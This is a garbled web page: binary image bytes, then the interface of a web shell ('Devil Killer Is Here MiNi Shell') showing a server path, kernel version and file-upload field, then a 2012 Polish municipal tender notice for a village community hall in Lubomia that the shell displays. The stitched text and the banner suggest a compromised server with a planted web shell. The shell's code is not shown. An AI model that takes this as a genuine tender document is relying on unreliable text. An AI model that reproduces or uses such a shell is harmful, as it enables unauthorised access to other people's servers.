JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120613/199308-N-2012.html

<p class="kh_header"><b>Lubomia: Budowa świetlicy wiejskiej w sołectwie Grabówka w Gminie Lubomia</b><br>
<b>Numer ogłoszenia: 199308 - 2012; data zamieszczenia: 13.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubomia , ul. Szkolna 1, 44-360 Lubomia, woj. śląskie, tel. 032 4516614/ 4516128, faks 032 4516614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lubomia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa świetlicy wiejskiej w sołectwie Grabówka w Gminie Lubomia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania przetargowego jest budowa świetlicy wiejskiej w sołectwie Grabówka w Gminie Lubomia, w której prowadzona będzie działalność administracyjno-kulturalno-oświatowa  dla przesiedleńców oraz innych mieszkańców Gminy. Obiekt zlokalizowany jest  na działkach 1574/48, 1575/48, 1530/48                        w sołectwie Grabówka. Obiekt jest budynkiem użyteczności publicznej, ze względu  na  wysokość  zaliczanym  do  obiektów  niskich.   
Budynek jest wolnostojący na terenie opadającym w kierunku widocznych w oddali stawów. W bezpośrednim sąsiedztwie nie ma innych znaczących obiektów architektonicznych.  Miejscowy plan zagospodarowania przestrzennego określa tereny otaczające w przeważającej części jako tereny otwarte zieleni. Po przeciwnej stronie drogi przewiduje się powstanie obiektu usług kultu religijnego.
Obiekt zaprojektowany jest tak, aby umożliwić osobom niepełnosprawnym korzystanie ze wszystkich oferowanych usług. 
Dane techniczne zabudowy: 
- pow. całkowita					 478,07 m2
- powierzchnia użytkowa                                                   270,22 m2
           - kubatura                                                                        2230,28 m3

Na parterze przy węźle sanitarnym jest wydzielona toaleta dostosowana do korzystania z niej przez osoby poruszające się na wózkach.  Dostęp do pomieszczeń na piętrze zapewni platforma o napędzie elektrycznym zamontowana na biegu schodów. 
Przy projektowaniu rzutu budynku uwzględniono kształt działki (rzut zbliżony do trójkąta) i starano się o maksymalne wykorzystanie terenu oraz o harmonijne wpisanie się w otaczającą przestrzeń. Całość zabudowy podzielona jest na cztery, wzajemnie przenikające się  proste bryły oparte na rzucie prostokątów.  Forma i nachylenie dachu umożliwia pokrycie  go dachówką ceramiczną z aluminiowo-szklanymi lukarnami doświetlającymi poddasze użytkowe.
Ściany dwuwarstwowe umożliwiają w warstwie docieplenia zastosowanie elementów drewnianych, imitujących charakterystyczny mur pruski.  Stolarka okienna jest prosta, drewniana z podziałem szprosami. Doświetlenie sali ogólnej zostanie osiągnięte poprzez duże przeszklenia, nadające zabudowie lekkość
i finezję. Budynek świetlicy oparty jest na rzucie litery L, niepodpiwniczony, przykryty wielospadowym dachem                     o kątach nachylenia połaci ok. 30° (wysokość od 5,97 do 11,38 m, szerokość 23,70 m, długość  29,72 m). 
Wejścia do budynku z poziomu terenu.  Wejście główne do budynku - od strony projektowanego parkingu przez centralnie usytuowany hol- wiatrołap. Na prawo od holu znajduje się segment jednokondygnacyjny                                         z poddaszem nieużytkowym o dwudzielnej bryle z wieżyczką nad częścią wyższą, na lewo segment  parterowy z poddaszem użytkowym. W części mieszczącej kotłownię i skład opału podłoga zagłębiona jest                      o  1,20 m. Obiekt będzie wyposażony w następujące instalacje i urządzenia:  
Instalacje wodno - kanalizacyjne
Instalacja wody zimnej z lokalnym podgrzewaniem wody.
Dla celów socjalno bytowych i technologicznych obiekt będzie zużywał max 1 dm3/s. Instalacja kanalizacyjna do szamba o pojemności 10 m3. 
Wody opadowe zostaną zgromadzone w zbiorniku na terenie działki i wykorzystane do podlewania zieleni i spłukiwania toalet.
Kotłownia
Kotłownia węglowa z piecem retortowym na ekogroszek. 
Instalacja c.o. - grzejnikowa wodna
Instalacja wentylacji mechanicznej i klimatyzacji 
Instalacje elektryczne i teletechniczne
Obiekt będzie wyposażony we wszystkie niezbędne instalacje elektryczne tj. oświetlenia (w tym awaryjne i ewakuacyjne), zasilania i sterowania urządzeń, zasilania gniazd wtykowych, instalację odgromową a także instalację telefoniczną i internetową. Na terenie instalacja oświetlenia zewnętrznego.
Instalacje monitoringu
Obiekt będzie wyposażony w instalacje alarmową systemu sygnalizacji włamania i napadu oraz instalację telewizji użytkowej CCTV wg projektu dostawcy.
Platforma przyschodowa 
Na biegu schodów zainstalowana będzie platforma dla osób niepełnosprawnych o wymiarach 750x700. Platforma wykonana winna zostać z wysokiej jakości stali malowanej proszkowo (wersja zewnętrzna ocynkowana).
Obiekt nie emituje zanieczyszczeń gazowych, nie wytwarza hałasu oraz wibracji. Przyjęte w projekcie rozwiązania przestrzenne, funkcjonalne oraz techniczne nie mają wpływu na powierzchnię ziemi, wody powierzchniowe i podziemne - są zgodne z obowiązującymi przepisami i obowiązującymi Polskimi Normami. 
Odpady stałe będą gromadzone w pojemnikach zlokalizowanych w wydzielonym miejscu i wywożone okresowo , zgodnie z zawartymi umowami.
Położenie śmietnika znajduje się na planie zagospodarowania terenu.
Wokół budynku wykonane zostanie zagospodarowanie terenu polegające  na wykonaniu miejsc parkingowych z płyt ażurowych, ciągów pieszo-jezdnych z brukowej kostki betonowej, elementów małej architektury (ławek, koszów na śmieci, stojaków na rowery), zieleni oraz oświetlenia zewnętrznego.
Droga o długości 165,50 m i średniej szer. 5,00 m umożliwiająca dojazd do obiektu będzie drogą jednojezdniową, dwukierunkową  z wjazdem z ul. Bordynowskiej o nawierzchni asfaltobetonowej. 
Jako dojazd przeciwpożarowy będzie służyła projektowana droga i plac przed budynkiem  umożliwiający  zawrócenie. 
Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja projektowa wykonana przez BUD-Serwis S. Deka, R. Deka sp.j. ul. Toruńska 7, 44-100 Gliwice zawierająca w szczególności projekt budowlano - wykonawczy, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary robót , która stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia.
Przedstawione w dokumentacji projektowej wskazania na materiały i urządzenia z podaniem producenta, znaku towarowego, pochodzenia, należy traktować jako przykładowe, określające standard tych materiałów           i urządzeń, ze względu na zasady ustawy, a zwłaszcza art. 29 do 31 ustawy PZP. 
Oznacza to, że wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji materiały i urządzenia, z zachowaniem odpowiednich, równoważnych (nie gorszych niż przedstawione w dokumentacji projektowej) parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności i standardów jakościowych całego układu, będącego przedmiotem projektu, z zapewnieniem uzyskania wszelkich ewentualnie wymaganych uzgodnień.


Szczególne obowiązki wykonawcy i wymagania odnośnie sposobu prowadzenia robót:
Rozpoznanie miejsca realizacji zamówienia.
Zaleca się by przed złożeniem oferty wykonawca zapoznał  się z miejscem realizacji zamówienia oraz bezpośrednim otoczeniem terenu realizacji zadania. 
Zabezpieczenie realizacji przedmiotu zamówienia:
Najpóźniej w dniu podpisania umowy Wykonawca przedłoży Zamawiającemu:
	aktualne uprawnienia budowlane osób, którym zamierza powierzyć wykonanie określonych przepisami prawa budowlanego funkcji wymagających ich posiadania, 
	aktualne zaświadczenia o przynależności Kierownika Budowy oraz Kierowników robót ze strony Wykonawcy i podwykonawców do właściwej Okręgowej Izby Inżynierów Budownictwa,
Zamawiający nie przewiduje zaliczkowania kosztów nabycia materiałów i realizacji robót.
Uwagi dotyczące realizacji przedmiotu zamówienia:
	wykonawca wykona przedmiot zamówienia zgodnie z dokumentacją projektową z materiałów fabrycznie nowych w I gatunku,
	realizacja zamówienia musi być prowadzona zgodnie z dokumentacją projektową - specyfikacjami technicznymi wykonania i odbioru robót, z zachowaniem terminów wynikających z  harmonogramu rzeczowo - finansowego robót,
Transport i składowanie odpadów.
Wykonawca jest zobowiązany do przestrzegania znajdujących zastosowanie przepisów odnoszących się do odpadów, w tym przepisów Ustawy o odpadach z dnia 27.04.2001 roku (tekst jedn. Dz. U. z 2010 r., nr 185, poz. 1243 z późn. zm.), w tym:
	przejmuje odpowiedzialność za powstałe w trakcie realizacji zamówienia odpady, ich segregację, transport i składowanie,
	ponosi koszty z tytułu jw. 
	na wniosek zamawiającego wskaże miejsce składowania lub utylizacji, oraz przedstawi stosowne dokumenty, że powstałe odpady zostały zagospodarowane (wywiezione na składowisko, poddane utylizacji) zgodnie z w/w ustawą oraz przepisami wykonawczymi wydanymi na jej podstawie.
Wykonawca udziela gwarancji na:
wykonane roboty budowlane co najmniej 60 miesięcy
urządzenia co najmniej 36 miesięcy
Zastosowane materiały i urządzenia muszą być wykonane zgodnie z Polskimi Normami przenoszącymi europejskie normy zharmonizowane.
W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się wynikające z art. 30 ustawy:
a) europejskie aprobaty techniczne;
b) wspólne specyfikacje techniczne;
c) Polskie Normy przenoszące normy europejskie;
d)normy państw członkowskich Unii Europejskiej przenoszące europejskie normy zharmonizowane;
e) Polskie Normy wprowadzające normy międzynarodowe;
f) Polskie Normy;
g) polskie aprobaty techniczne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.25.00-6, 45.31.14.00-1, 45.31.23.11-0, 45.31.11.00-1, 45.31.57.00-5, 45.33.20.00-3, 45.20.00.00-9, 45.26.00.00-7, 45.26.20.00-1, 45.26.10.00-4, 45.10.00.00-8, 45.11.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium w wysokości 30 000,00 PLN. 

Wadium może być wnoszone w jednej lub kilku następujących formach: 
1.	pieniądzu;
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kre?dytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2007r Nr 42, poz. 275 z późn. zm.. 

Wadium wniesione w pieniądzu wpłaca się przelewem na konto rachunek bankowy Zamawiającego: 
- Bank Spółdzielczy Gorzyce
nr 42 8469 0009 0010 3408 2000 0004
W tytule przelewu należy wpisać:- wadium przetargowe na zadanie pn:  Budowa świetlicy wiejskiej w sołectwie Grabówka w Gminie Lubomia

Jeżeli wadium wnoszone jest w formie innej niż pieniądz (poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości), oryginały dokumentów należy złożyć w kasie Zamawiającego uzyskując potwierdzenie ich złożenia na kserokopii dokumentów.
Wnoszona przez Wykonawcę ubezpieczeniowa lub bankowa gwarancja zapłaty wadium musi mieć charakter samoistny, nieodwołalny, bezwarunkowy oraz być płatna na pierwsze pisemne żądanie zamawiającego bez konieczności spełniania jakichkolwiek dodatkowych warunków.
Wadium należy wnieść przed upływem terminu składania ofert.
Poręczenie lub gwarancja, o których mowa powyżej powinno być ważne przez okres związania ofertą, powinno dotyczyć konkretnego zamówienia i zawierać klauzulę o dostępności środków przez Zamawiającego w okresie trwania procedury udzielania zamówienia, bez spełnienia jakichkolwiek dodatkowych warunków.
W przypadku wnoszenia wadium w formie innej niż pieniądz odpowiednie dokumenty winny być złożone w kasie Zamawiającego w terminie wyznaczonym dla złożenia oferty. Wadium uważać się będzie za wniesione wtedy, kiedy znajdować się będzie ono na rachunku Zamawiającego przed upływem terminu składania ofert (decyduje data uznania rachunku bankowego Zamawiającego) lub zostanie zdeponowane w kasie Zamawiającego (w razie wnoszenia wadium w formie innej niż pieniądz).
Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie przez Zamawiającego wykluczony z postępowania. Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe, z przyczyn leżących po stronie wykonawcy,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie,  o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek rozumiany jako zrealizowanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch robót budowlanych odpowiadających swoim rodzajem niniejszemu zamówieniu. Przez roboty odpowiadające swoim rodzajem niniejszemu zamówieniu Zamawiający rozumie obiekty użyteczności publicznej o kubaturze nie mniejszej niż 2000 m3 i wartości nie mniejszej niż.3 000 000 PLN.
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona na zasadzie spełnia/nie spełnia na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek rozumiany jako posiadanie przez wykonawcę do dyspozycji przy wykonywaniu zamówienia odpowiednio wykwalifikowanych osób na następujących stanowiskach:

	Kierownik budowy - Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej.  Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała aktualne zaświadczenie o wpisie na listę właściwej izby samorządu zawodowego. Osoba ta winna posiadać doświadczenie min. 3 lata na stanowisku kierownika budowy.

	Kierownik robót w branży instalacyjno - sanitarnej  Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała uprawnienia do kierowania robotami w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia w zakresie sieci wodociągowych i kanalizacyjnych, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała aktualne zaświadczenie o wpisie na listę właściwej izby samorządu zawodowego. Osoba ta winna posiadać doświadczenie min. 3 lata na stanowisku kierownika budowy.
	Kierownik robót w branży elektrycznej i elektroenergetycznej - Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała uprawnienia do kierowania robotami bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych lub odpowiadające im ważne uprawnienia w zakresie sieci, instalacji i urządzeń elektrycznych , które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała aktualne zaświadczenie o wpisie na listę właściwej izby samorządu zawodowego. Osoba ta winna posiadać doświadczenie min. 3 lata na stanowisku kierownika budowy.


Kierownik robót w branży drogowej - Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała uprawnienia do kierowania robotami  bez ograniczeń    w specjalności drogowej  lub odpowiadające im ważne uprawnienia które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała aktualne zaświadczenie o wpisie na listę właściwej izby samorządu zawodowego. Osoba ta winna posiadać doświadczenie min. 3 lata na stanowisku kierownika budowy.

Uprawniony geodeta - posiadający uprawnienia zawodowe do geodezyjnej obsługi  inwestycji.

Zamawiający dopuszcza możliwość łączenia poszczególnych funkcji.

Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona na zasadzie spełnia/nie spełnia na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek rozumiany jako:

dysponowanie środkami finansowymi lub posiadanie zdolności kredytowej na poziomie nie niższym niż kwota 1 000 000,00 zł,
	posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości nie niższej niż 2 000 000,00 zł.

Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona na zasadzie spełnia/nie spełnia na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
